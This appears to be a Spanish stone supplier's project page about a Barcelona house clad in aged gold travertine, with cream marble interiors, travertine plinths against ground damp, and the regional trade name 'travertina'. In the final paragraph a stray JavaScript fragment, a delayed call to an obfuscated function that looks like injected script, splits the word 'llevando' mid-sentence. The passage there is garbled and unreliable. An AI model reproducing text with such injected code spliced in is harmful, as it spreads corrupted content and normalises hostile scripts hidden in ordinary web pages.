Vivienda de travertino localizada en la provincia de Barcelona. Compuesta de un aplacado en travertino oro envejecido en gran formato.

En este caso se buscaba una piedra especial por sus características y su resistencia a la humedad  por la zona donde está ubicada la propia vivienda. La resistencia a la helada era otras de las condiciones propuesta por la dirección , condiciones que la ficha técnica del travertino oro lo daba .

El resto de la vivienda de travertino en Barcelona , está compuesta por un raspado en blanco , y un aluminio gris que potencia la piedra.

La propiedad juega en el interior de la vivienda con otro mármol tipo crema marfil, para conseguir mantener tonos cálidos en los espacios de la vivienda. A la vez que completa la escalera del mismo mármol crema marfil para el acceso exterior a la vivienda.

El resto de este  proyecto en mármol, está compuesto de unos zócalos de travertino de altura de un metro que bordea la vivienda. El objetivo que se pretende además de resaltar una decoración natural, es la de evitar mantenimientos en zonas desprotegidas como son las paredes en contacto con la humedad del terreno.

En ciertas provincias de la zona de Cataluña , nuestro material tiene denominación de travertina. Nombre comercializado por distribuidores de la zona y de fácil pronunciación en el dialecto catalán.

Travertina , como denominan en cataluña a este producto exclusivo, se lleva comercializado en aquella zona algo más de 35 años, llevandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando a colocar en los años 80  los aplacados de las entidades de crédito Banco Sabadell. Obras que aún podemos ver colocados de nuestras canteras de travertino.